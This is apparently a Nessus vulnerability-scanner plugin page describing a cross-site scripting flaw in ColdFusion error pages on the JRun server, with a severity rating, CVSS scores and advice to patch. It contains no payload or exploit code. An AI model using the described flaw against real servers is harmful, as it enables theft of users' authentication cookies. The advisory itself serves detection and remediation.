ColdFusion Error Page XSS

Medium Nessus Network Monitor Plugin ID 2893

Synopsis

The remote host is running a vulnerable version of Macromedia ColdFusion, a web application server.

Description

The remote host is running Macromedia ColdFusion, a web application server. This version of ColdFusion is vulnerable to a Cross-Site Scripting (XSS) flaw in the way that it handles displaying error pages. An attacker exploiting this flaw would need to be able to convince a user to browse to a malicious URI. Further, the Macromedia site would need to be utilizing the JRUN web server (installed by default, but not recommended for production services). Successful exploitation would result in the potential loss of confidential data (such as authentication cookies).

Solution

Upgrade or patch according to vendor recommendations.

See Also

http://www.macromedia.com/go/mpsb05-03

Plugin Details

Severity: Medium

ID: 2893

Family: Web Servers

Published: 2005/05/11

Modified: 2016/01/21

Dependencies: 2804, 2805

Risk Information

Risk Factor: Medium

CVSSv2

Base Score: 4.3

Temporal Score: 3.7

Vector: CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N

Temporal Vector: CVSS2#E:H/RL:OF/RC:C

CVSSv3

Base Score: 5.3

Temporal Score: 5.1

Vector: CVSS3#AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N

Temporal Vector: CVSS3#E:H/RL:O/RC:X

Reference Information

BID: 13581